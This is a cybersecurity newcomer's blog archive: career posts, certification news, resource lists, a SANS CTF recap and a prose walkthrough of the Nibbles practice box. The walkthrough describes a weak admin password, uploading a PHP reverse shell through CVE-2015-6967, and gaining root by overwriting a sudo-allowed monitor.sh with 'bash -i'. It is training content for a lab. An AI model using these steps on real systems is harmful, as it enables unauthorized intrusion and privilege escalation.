It’s always weird to start a blog post with an image, but that’s what I’m doing here. You see, I’ve got a ton to be thankful for at this point. In the past 7 months, I’ve participated in the SANS Cyber FastTrack, scoring 65th out of 3,498 people. I’ve been generously gifted the PTS Course from eLearnSecurity and obtained my eJPT certification, and now, I’m proud to announce that ActualTom has obtained his first corporate sponsorship from the awesome folks over at CyberSecLabs (https://www.cyberseclabs.co.uk/).
I first met the founder of CyberSecLabs through networking in random InfoSec communities and Discord servers. We discussed my frustrations with HackTheBox’s platform (specifically, the fact the VPN is open to a bunch of users and labs get messed up a lot), he offered to sponsor a subscription to their platform.
My reviews will be honest and to the point of a thoughtful review of their platform. That said, the Beginner labs in CyberSecLabs are supposed to be a good prep for the OSCP certification I’m dutifully working towards.
So, to the team at CyberSecLabs – THANK YOU. Really, from the bottom of my heart, thank you. You guys have gone out of your way to be helpful in your Discord, and you’ve made my life, consisting of a fulltime job, a family, a college degree I’m chasing, a non-profit I’m helping run, and finally my passion, achievable. I look forward to reviewing your platform, and again, thank you.
This is the 2nd box of TJ Null’s OSCP Preparation list, and the first one I’m publishing my writeup for. I recorded the video for YouTube earlier this evening, and I’ll get that posted as soon as my awesome new branding, courtesy of Nathan Cavitt at Mad Standards, comes in!
Once this box is launched, run your standard autorecon scan against it, and wait while it finishes. I tend to add the IP address of the box to my /etc/hosts so I can track the folders easier. As you can see by the screenshot below, port 22 (SSH) and port 80 (HTTP) are open, and the subsequent scans are kicking off.
With CTF-like one-off boxes to hack, chances of port 22 having anything are pretty slim to none here. SSH is not a very oft-hacked protocol, and bruteforcing isn’t normally the goal here. Let’s take a look at port 80’s nmap-http scan.
When autorecon kicks off the subsequent scans, it runs with the appropriate scripts for the port. Great! Here you can see there is a comment on the index of the page that refers you to the nibbleblog directory. Let’s do some enumeration with gobuster on the nibbleblog directory and see what we can find.
Seems pretty standard so far. A login page exists at admin.php, and pulling up the README, you can see that we are running nibbleblog version 4.0.3. A quick jaunt to Exploit-DB (https://www.exploit-db.com/exploits/38489) will show there is an exploit, but you need to know the username and password for it! Time to do some more looking around.
If you try brute-forcing the password with hydra, you will quickly get an error of blacklist protection, causing you to have to reboot the VM. Luckily, taking a look at config.xml and just trying some simple ones shows that we have a lazy admin here!
At this point you can run metasploit and you will get a shell, enabling you to grab the user flag. However, when I went that route, I had issues with privilege escalation that I did not have when I ran this exploit manually, and as I’m prepping for the OSCP, that’s the path we will take here. Let’s keep at it! Login to the website with the above credentials, and let’s keep at it!
The exploit, reading Exploit-DB and the CVE (https://nvd.nist.gov/vuln/detail/CVE-2015-6967) says it utilizes an unrestricted file upload vulnerability in the My Image plugin to upload an executable file and access it at “content/private/plugins/my_image/image.php” so that’s exactly what we will do. I grabbed a PHP reverse shell courtesy of pentestmonkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php), updated it with my IP address and port, and renamed it to image.php, finally uploading it via the Plugins page. All that’s left to do is browse to the page and get the reverse shell!
From here it’s trivial to browse to /home/nibbler and read user.txt. But what is our path to root from this point? The first, and easiest thing to do is check permissions by running sudo -l. As you can see, there’s something of interest here!
Well, you know we have to check that out! Going to the folder though all we see is a zip file. Unzipping it, we get the monitor.sh discussed. At this point, there’s a few things we can do. You could edit monitor.sh to run netcat back to another listener you set up, or you can go about it the quick way, like this:
As you can see, we echo’d “bash -i” and overwrote monitor.sh with the command to give us an interactive bash shell. We then ran it using sudo, which ran it with no password as ROOT. Once done, we have a root shell! From here it’s trivial to go to /root/root.txt and get the flag for your submission!
I hope you’ve enjoyed the second machine in the TJ Null OSCP Prep list! Stay tuned for more!
This will be Day 3 of my OSCP Preparation. The mind-map linked in the previous post is what I’m still working on, but I just want to first take a moment out of discussing purely hacking to talk about how humbled I am. Veteran Security concluded their board elections a little over a week ago, and on June 1st, 2020, I took over as the Board Chair for the company. It’s an amazing organization owned and run by veterans for veterans transitioning into cyber security. We have some pretty awesome things planned, but that’s nothing compared to what the group has already done for so many, myself included. More than simply providing resources and guides to transition, Veteran Security (VetSec, Inc.) provides a much needed community – a place for veterans to discuss the issues that face our community and be there for one another.
Now then, Day 3 of OSCP. I have completed OverTheWire: Bandit through Level 23, and I have completed Wave 1 of the Zero to Hero blog for TryHackMe. Both platforms have been great for solidifying basic Linux command knowledge, establishing a solid methodology, and exposing me to many different vulnerabilities present in both Linux and Windows.
Much of what I’ve been done has been walkthrough style so far. I anticipate around next week (Day 10 OSCP or so) I will move into the lists of machines provided by TJ-Null and start working on VulnHub and HackTheBox machines. This is where it’ll get real.
I continue to make videos for my YouTube Channel, like this walkthrough of LazyAdmin on TryHackMe, and I continue to stream daily. This has been a great way for me to reinforce the knowledge I’ve gained by doing the same box a couple times.
Anyways, if you like following and learning along with me, keep checking out my YouTube and my Twitch and I’ll see you there!
After my stream today I promised I’d post my MindMap for tackling the OSCP. Here is the MM version of it, which you will need the FreeMind software to open it with. If you have any issues, shoot me a message on Discord or comment here!
A short month ago I had this idea in my head, after being exposed to the world of Twitch via my kids and a couple of people I’ve learned from – why not try it myself? So I tugged on my Logitech headset, turned on my webcam, and proceeded to make a fool out of myself attempting to get through rooms on a website called TryHackMe. Thanks to the awesome people in the Ur-Hackr.com Discord, the VetSec Inc. Slack, and my amazing family, I’ve stuck with it now for a month. Monday-Friday, 5pm PST, on Twitch, beating my head against a keyboard.
I also recorded a 5 minute trial course on Cybrary.it, only to seemingly see it fall through (FYI, I got ghosted, for anyone else that gets any of their recruiting emails). I upped my participation in VetSec a bit, and learned a lot about the industry I’m transitioning into. I finished my second course on the path to a Masters Degree, and started the third.
Over the month, I figured my streaming would be a good outlet for me to get some practice time, and if a few people came to say hi online, so be it. I didn’t expect what really happened. In a short month, the generosity of community has been amazing. As I sit writing this, 156 people follow my stream (basically, they’ve agreed to get email notices when I go live). Additionally, 25 people have subscribed in total, which means they’ve paid to eliminate advertisements for themselves on my stream and support me monetarily. I didn’t anticipate either. I had hoped for maybe 25 followers and a couple subs. Blown. Away.
In addition to this, thanks to the leadership at VetSec Inc. and the wonderful sponsorship by eLearnSecurity, I was gifted a Cybersecurity course called Penetration Testing Student. This past week I passed the exam and am now a certified eJPT.
Finally, even though I can’t go into too much details yet, my work with VetSec, Inc., is just beginning. For anyone that is a veteran interested in CyberSecurity, or is active duty and looking for more information on the Information Security domain, please contact me or visit VetSec at https://veteransec.com. My work there is only beginning and I look forward to sharing more of my journey with all of you! Stay tuned!
It’s been a week now since my last post, and I feel like I’ve learned an exponential amount. I haven’t done as much housework as I swore I would while staying home away from COVID-19, and I haven’t worked on my cars like I said I would, either. My garage isn’t perfectly organized like I thought it would be, but man, I’ve learned a ton.
I feel like a week ago I didn’t know anything about penetration testing, at least compared to what I know now. A couple of weeks ago, thanks to the non-profit VeteranSec (www.veteransec.com), I was offered the opportunity to blog for them about my transition from the Navy over the next few years to the Cyber Security field. Then, about a week ago, VeteranSec partnered with eLearnSecurity to give 10 VeteranSec members the Penetration Testing Student (PTS) course and voucher for the eJPT (Junior Penetration Tester) certification. VeteranSec gave me one for being involved in the organization, with the promise of a review of the course for both groups.
So, I started that course. While working on my Masters Program. In addition, to supplement the knowledge that is coming with the PTS, I subscribed to TryHackMe and started working through their rooms. After attending a few conferences with other CyberSecurity personnel on the ‘net, diversifying income streams seemed to be a common thread, along with giving back to the community through teaching, blogging, etc. All of this, I was assured, would help me stand out. So I started this blog, and a nightly stream on Twitch.
For the past week and a half, I’ve sat down at my computer each night, chatted with people, and worked on some TryHackMe rooms, learning some CyberSecurity and teaching what I know to anyone that tunes into my stream. It’s honestly been a wild ride. I am still firmly in the beginner camp, of course, so I didn’t really think I’d have anything to offer many people. Turns out I was a little off in my assumption.
On Twitch, followers are people who sign up to receive notifications that your channel is now streaming. Since I made my account, and played around with streaming at all, it’s been 15 days. In those 15 days, I’ve gained 77 followers. Twitch also has a subscribe option. This gives people the benefit of throwing the streamer they like a few bucks each month to show their appreciation for the content, and in doing so, the streamer can offer benefits such as the ability to show old videos, change the quality of the videos to support a weaker internet connection, etc.
After 15 days, I now have 10 subscribers. One person is enjoying the learning so much, they’ve promised to giveaway one subscription each week in the channel to help me attract viewers. I am honestly, completely blown away. It’s awesome. And the thing is, the money isn’t something I care about one bit. Playing around on places like TryHackMe is something I’d do anyways. Talking to others about Cybersecurity is also something I would do anyways. But to see the level of community development, and to feel like I’m truly helping people – that’s where the reward here is.
And it’s awesome. The community is great, especially online in this venue among infosec people, and it’s awesome to see the support.
I’ll keep writing, too. I started my 3rd class in my Masters program today. I started the 3rd module in my PTS Course, as well. And I’m continuing through TryHackMe. Stay tuned. It’s going to be a wild ride.
In my discussions at places like VetSecCon Jr 2020 (put on by the guys at http://www.veteransec.com), one of the things that has been consistently discussed is how to set yourself apart when you go look at jobs. Numerous ways were discussed, including discussing your home lab, blogs, publications, volunteer work in the Cyber Security community, etc. There are a few people who also include working on pentesting challenges, capture the flags, etc., and even fewer that try teaching those back to the community.
Today I wanted to share some of the links that have gotten me on my way, as well as make a plug for my next project, and hope you all tune in for a bit as well. So, first off, I will be streaming nightly on Twitch. This will include HackTheBox and TryHackMe to begin with. Additionally, I will be discussing general cybersecurity topics and basically anything else the audience wants to see. This will be focused at beginners, and I’ll be learning right along with you guys. My stream will eventually be hosted right here on my website, which is going to be strictly more Cyber Security. All works in progress!
Anyways, here are some things I want to share with you guys, link-wise. These are all resources I have used or have been told great things about.
Twitch Streams: Actual_Tom – My stream, weekdays at 5pm PST. Hope to see some of you there! TheMayor11 – Joe, from CyberSecPadawan. Great stuff, and he’s always helpful! TheCyberMentor – Heath Adams’ stream, weekdays at 9am PST.
VeteranSec – This is a Cyber Security community for military veterans! The Cyber Mentor – Heath Adams’ site, creator of two great Udemy Courses.
TryHackMe – Great site for beginners into CyberSecurity. I have a paid subscription, excellent place to learn. A lot of my streams come from here. CanHackMe – A few interesting challenges. HackTheBox – Spin up a VM and have at it! Less guided than TryHackMe. CyberSecLabs – I see a lot of people working on these now, haven’t done it myself, but they look pretty good!
Udemy – A lot of the courses can be hit or miss. Both by Heath Adams are fantastic. OverTheWire – Gamified Learning of Linux. Great tool. UnderTheWire – Like OverTheWire, but with PowerShell. RegExOne – Learn Regular Expressions. Important! PluralSight – Video based learning. WGU offers alumni free access.
I’m sure there’s more that I’m missing, and I will endeavor to keep this up to date as we go. I’m looking at adding a link list to the side of my page, maybe that’s a good spot for it. Anyways, please tune in to my Twitch Stream, for now, daily at 10pm PST.
There’s a thousand posts about this topic, covering everything from whether Cyber is right for me, to the different certifications one could get, all sorts of stuff. I’m going to try and take a slightly different tack with this one, and talk about learning in general.
You see, I joined in the Navy fresh out of High School. I didn’t even really know what I wanted to do with my life at that point. I didn’t understand what work in the real world was like – up until this point, I’d worked at a small cafe in Port Ludlow (which, unfortunately, went under within the past year), and McDonalds. I knew I liked computers, and I knew my grades weren’t the best. Perfect spot for a Navy recruiter to grab me, I know.
Anyways, after 18 years of service to our country at this point, I’m most grateful to the Navy’s Nuclear Power Program for teaching me how to learn. The academia we go through is very rigorous. It’s extremely fast paced, teaching us the ins and outs of nuclear power inside of 18 months, including how the equipment actually functions well enough for us to do maintenance on it.
So after all this, how do you get started in Cybersecurity? Find out if you like it. Learn about it! Not just how to do the jobs, but what the jobs are about! If you’re a veteran, like me, check out places like VeteranSec. Network on LinkedIn. Peruse Reddit and look through the various groups there. I just did an AMA on Navy Submarine life, look for one on Cybersecurity! There are tons of ways to learn more about the profession. The Cyber Mentor has some great videos on a day in the life of a penetration tester. There are some great blogs, and if you want to actually try some of it out on the red teaming side of the house, then visit sites like Ur-Hackr, TryHackMe, and HackTheBox. For those super new to the profession, I am a big fan of the community that has been built up thus far in Ur-Hackr (of which I am a moderator), so come join us on Discord as well!
I’ll be updating a list of awesome links to gamified resources for hacking, learning cybersecurity, and more on the right sidebar when I get around to it. Until then, try some of the links up above. Remember, especially in our current age of coronavirus, people are our greatest asset. Communicate with them! This community is awesome and we’re all here to help.
This year, as I’m finally on shore duty and headed towards that inevitable transition from the military life, I heard about the Cyber Fast Track offered by the SANS Institute. When I read about it, I was a complete n00b to VetSec (and by many metrics still am). Since then, I’ve discussed CTFs with quite a few people, and when I saw the opportunity to sign up for the SANS Cyber Fast Track CTF, I jumped at the opportunity.
This year, the competition happens in three phases – the first phase was a 48-hour Capture-the-Flag opportunity. The top placers in the CTF are invited to continue on.
The 48-hour CTF was a bit of a doozy for someone who doesn’t have much experience doing CTFs (READ: This was my first). I’d played around in Hack The Box before, and I have a Security+ certification, but nothing would’ve prepared me for this. There were around 45 challenges, covering some general topics like finding a flag in source code, but then delving into Web Exploits, Reverse Engineering, Forensics, Networking, Binary Exploitation, and Cryptography. I settled in with my caffeine supply of choice and proceeded to hammer as many challenges out as I could, while graciously my wife took over the parenting for the next 48 hours.
I slept about 8 hours in the 48 hours, stopping when I hit brick walls so I could let my subconscious do some work. I stayed persistent and taught myself a lot throughout the competition, but was a little bummed when, at the 48-hour mark, I had only completed 63% of all of the challenges. I didn’t think I had done nearly well enough to place to move on.
After the scores were tallied, I found out that, despite only completing 63% of the challenges, I placed 65th out of 3,498 players. Quite a few had signed up and only done a couple challenges, or didn’t play at all. I was stoked!
Just a week ago, I received my invitation email to Phase 2. Phase 2 consists of access to CyberStart Game, a CTF-style playground with 4 months of time in it, covering general topics, python topics, forensics, plus a new base of challenges that haven’t unlocked yet. Additionally, everyone invited to phase 2 gains access to Cyberstart Essentials, which is a course,
reinforcing key concepts with more than 45 in-browser interactive labs and 17 extended practical skill applications in virtual-machine based labs. You’ll establish a core understanding of technology component functions and apply that knowledge to security concepts such as reconstructing a crime from digital evidence or locating exploitable flaws in software and websites.
Plus, at the end of CyberStart Essentials, you will be able to take the GIAC Essentials Exam. Whatever your future cyber career path looks like, this accomplishment will look great on your résumé and support you on your journey.
As of this writing, I haven’t touched Essentials and I’m about 50% of the way done with Game. I plan on keeping up with the persistence, and hopefully finishing all of Game and Essentials. I’d love to get the $22,000 scholarship at the end of this to take the SANS courses, but we’ll see. No matter what, this has been a great learning experience!